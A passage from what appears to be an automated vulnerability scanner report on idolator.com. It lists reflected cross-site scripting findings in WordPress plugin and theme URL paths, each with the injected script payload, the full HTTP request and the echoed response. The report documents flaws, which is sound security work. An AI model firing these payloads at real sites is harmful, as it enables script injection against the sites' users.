Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins24d4e\"><script>alert(1)</script>827c3f95aec/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.164. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea543"><script>alert(1)</script>b7d35424d0 was submitted in the REST URL parameter 3. This input was echoed as ea543\"><script>alert(1)</script>b7d35424d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-playerea543"><script>alert(1)</script>b7d35424d0/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36023
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-playerea543\"><script>alert(1)</script>b7d35424d0/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.165. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e990"><script>alert(1)</script>c4efd4a2e08 was submitted in the REST URL parameter 4. This input was echoed as 6e990\"><script>alert(1)</script>c4efd4a2e08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm26e990"><script>alert(1)</script>c4efd4a2e08/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:34 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm26e990\"><script>alert(1)</script>c4efd4a2e08/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.166. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aff7"><script>alert(1)</script>ab71aec3e75 was submitted in the REST URL parameter 5. This input was echoed as 5aff7\"><script>alert(1)</script>ab71aec3e75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js5aff7"><script>alert(1)</script>ab71aec3e75?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:46 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js5aff7\"><script>alert(1)</script>ab71aec3e75?ver=2.8.6" />
...[SNIP]...

4.167. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e2c"><script>alert(1)</script>c4da70b726 was submitted in the REST URL parameter 1. This input was echoed as 84e2c\"><script>alert(1)</script>c4da70b726 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content84e2c"><script>alert(1)</script>c4da70b726/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:41 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35954
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content84e2c\"><script>alert(1)</script>c4da70b726/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf" />
...[SNIP]...

4.168. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac6"><script>alert(1)</script>32f84736faa was submitted in the REST URL parameter 2. This input was echoed as b4ac6\"><script>alert(1)</script>32f84736faa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb4ac6"><script>alert(1)</script>32f84736faa/wpaudio-mp3-player/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:52 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsb4ac6\"><script>alert(1)</script>32f84736faa/wpaudio-mp3-player/sm2/soundmanager2.swf" />
...[SNIP]...

4.169. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e7e"><script>alert(1)</script>971d8cdf90b was submitted in the REST URL parameter 3. This input was echoed as 62e7e\"><script>alert(1)</script>971d8cdf90b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player62e7e"><script>alert(1)</script>971d8cdf90b/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player62e7e\"><script>alert(1)</script>971d8cdf90b/sm2/soundmanager2.swf" />
...[SNIP]...

4.170. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa4a5"><script>alert(1)</script>b8140d6ede4 was submitted in the REST URL parameter 4. This input was echoed as fa4a5\"><script>alert(1)</script>b8140d6ede4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2fa4a5"><script>alert(1)</script>b8140d6ede4/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:15 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2fa4a5\"><script>alert(1)</script>b8140d6ede4/soundmanager2.swf" />
...[SNIP]...

4.171. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6144"><script>alert(1)</script>199c16dfceb was submitted in the REST URL parameter 5. This input was echoed as c6144\"><script>alert(1)</script>199c16dfceb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swfc6144"><script>alert(1)</script>199c16dfceb HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:26 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swfc6144\"><script>alert(1)</script>199c16dfceb" />
...[SNIP]...

4.172. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/themes/idolator_1.5/images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f889"><script>alert(1)</script>d06b96a1bc7 was submitted in the REST URL parameter 1. This input was echoed as 2f889\"><script>alert(1)</script>d06b96a1bc7 in the application's response.